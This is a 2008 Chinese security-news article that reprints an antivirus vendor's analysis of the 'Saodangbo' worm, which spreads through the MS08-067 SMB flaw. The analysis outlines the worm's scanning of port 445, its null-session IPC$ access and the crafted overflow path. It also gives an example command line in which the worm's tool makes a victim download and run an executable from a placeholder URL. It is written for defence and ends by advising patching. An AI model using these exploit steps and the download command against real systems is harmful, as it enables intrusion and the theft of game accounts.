科技行者

行者学院 转型私董会 科技行者专题报道 网红大战科技行者

知识库

知识库 安全导航

至顶网安全频道"扫荡波"蠕虫泛滥 未打补丁的系统遭殃

"扫荡波"蠕虫泛滥 未打补丁的系统遭殃

  • 扫一扫
    分享文章到微信

  • 扫一扫
    关注官方公众号
    至顶头条

在我的印象中,每一个传播严重的蠕虫都和一个系统漏洞有关:SQL Server蠕虫王,数小时传遍全球。

作者:李铁军 来源:金山 2008年11月13日

关键字: 病毒播报 病毒

  • 评论
  • 分享微博
  • 分享邮件
 

在我的印象中,每一个传播严重的蠕虫都和一个系统漏洞有关:SQL Server蠕虫王,数小时传遍全球;冲击波、震荡波让普通网民认知到蠕虫的威力。而这个MS08-067漏洞,在补丁发布数周之后,还没有发现蠕虫泛滥,也可能是众多可替代微软update补丁的修复方案越来越普及的原因。

事实上,在这个漏洞发布之后不久,在制造木马盗号的圈子里,各种不同版本的扫描器、批量抓鸡工具在迅速泛滥。因此证明,没有完美的漏洞修复方案,互联网上总是很容易就找到大量不打补丁的计算机。

上周末,把木马下载器、漏洞扫描工具、蠕虫集成在一起的病毒终于泛滥。在这之前,一直有不少网民报告系统崩溃不能上网的现象,但一直没有捕获病毒样本。原来这一类病毒入侵后,会尝试删除自身,抓到的样本只是木马下载器,而蠕虫在得手后就自杀了,这在某种程度上也削弱了蠕虫的传播范围。

以下是毒霸分析员对Worm.SaodangBo.a.94208的技术分析

MS08-067远程下载者(扫荡波)分析报告

1. 释放病毒体

病毒运行后释放以下文件:

aaa.bat
mrosconfig.exe
vista.exe
qqq.sys

其中aaa.bat控制整个病毒的运行流程。

2. 扫描网内计算机

首先调用vista.exe对本网段(C类)范围内的所有计算机的445端口进行扫描。之后,挑选出可以连上445端口的计算机保存到一个列表文件中。

3. 攻击在线的计算机(有漏洞的会出现现象或中毒)

然后,病毒调用mrosconfig.exe对列表文件中的计算机发送RPC请求,使远程计算机中的svchost.exe中解析RPC路径时溢出,在远程计算机中下载并执行http://xxx.xxx.com/down/ko.exe。

mrosconfig.exe是一个实现下载者功能的远程溢出利用工具, 对应的命令行为:

mrosconfig.exe 要攻击的计算机的IP 要在远程下载的病毒的url

如:

mrosconfig.exe 127.0.0.1 http://xxx.xxx.com/down/ko.exe

具体的步骤如下:

(1)使用空用户、空密码连接上远程计算机上的IPC$共享。

(2)向连上的计算机发送远程路径".\\a\..\..\NN"。如果远程计算机上未修复MS08-067漏洞,那么svchost.exe调用NetpwPathCanonicalize函数解析此路径时会溢出,从而执行远程路径后的指令。

(3)溢出指令下载附在指令后的url对应的文件到远程计算机上,并运行此文件。

(4)下载的文件是一个木马下载者,该下载者还会下载其他木马程序安装到被攻击计算机上。已知会下载的木马程序包括:机器狗木马下载器,QQ三国、完美系列网游等游戏盗号器。

如果攻击失败,则远程计算机会出现“SVCHOST.exe”出错提示,只有这个现象是用户可见的。

如果用户反映这个问题,则可以认为其所在的局域网内有机器中毒,但自身没有中,打上补丁就可以避免。

4. 自删除病毒体

删除释放的:mrosconfig.exe、vista.exe、qqq.sys、aaa.bat病毒文件。

    • 评论
    • 分享微博
    • 分享邮件
    邮件订阅

    如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。

    重磅专题
    往期文章
    最新文章